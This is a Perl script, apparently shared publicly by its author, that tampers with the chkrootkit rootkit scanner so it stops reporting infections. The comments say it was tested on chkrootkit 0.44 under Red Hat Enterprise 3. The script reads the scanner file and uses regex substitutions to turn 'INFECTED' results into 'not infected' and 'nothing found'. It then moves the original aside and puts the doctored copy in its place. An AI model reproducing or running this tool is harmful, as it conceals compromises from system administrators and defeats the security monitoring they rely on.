A perl script to backdoor chkrootkit rendering it useless. Tested on chkrootkit version 0.44 running on Red Hat enterprise 3.
25f5835469aa6bfe744b1e2b431b83379eda7e12ff32ef7155bc1202e115e406
#!/usr/bin/perl -w
# Anti-antirootkit coded by saic. This code will stop chkrootkit from
# doing its thing. Tested on chkrootkit version 0.44 running on Red Hat
# enterprise 3. The code can be easliy modified for other anti-rootkit
# tools.
#
# Usage: Just run the Perl-script and it'll take care of the rest.
# No, this isn't a script-kiddie tool. Skiddies don't gain root very
# often. You will need write permissions on the files to change (which
# is usually only granted to the superuser). This is NOT some
# root-gaining exploit.
#
# Make sure to drop me an e-mail (introop at gmail dot com) if there are
# updates that may stop this code from working. Oh yeah, this is under the
# GNU GPL by the way. Not that anybody would steal this code, but still.
# Shell donations are welcome aswell.
open(INFILE, "/usr/bin/chkrootkitscan") or die "File not found, are you sure it's installed?\n File not found:";
print "Editing chkrootkit...\n";
sleep(1);
local $/; # Read the whole file instead of one line at the time
$file_content = <INFILE>; # Load the file into a variable
$file_content =~ s/STATUS=\$\{INFECTED}/STATUS=\$\{NOT_INFECTED}/g; # Start replacing values
$file_content =~ s/0\)\ echo "INFECTED"/0\)\ echo "not infected"/g;
$file_content =~ s/echo \$\{files}/echo "nothing found"/g;
$file_content =~ s/echo \$\{dirs}//g; # New file is loaded into $file_content
close INFILE; # Close the file
readpipe "mv /usr/bin/chkrootkitscan ./chkrootkit.backup"; # Create backup
open(OUTFILE, ">>output.txt"); # Open temporary output-file
print OUTFILE ("$file_content"); # Write the edited content to the file
close OUTFILE; # Close the file
readpipe "mv output.txt /usr/bin/chkrootkitscan"; # Replace chkrootkit with temporary output-file
readpipe "chmod +x /usr/bin/chkrootkitscan"; # Make the replacement executeable
print "chkrootkit has been edited.\n";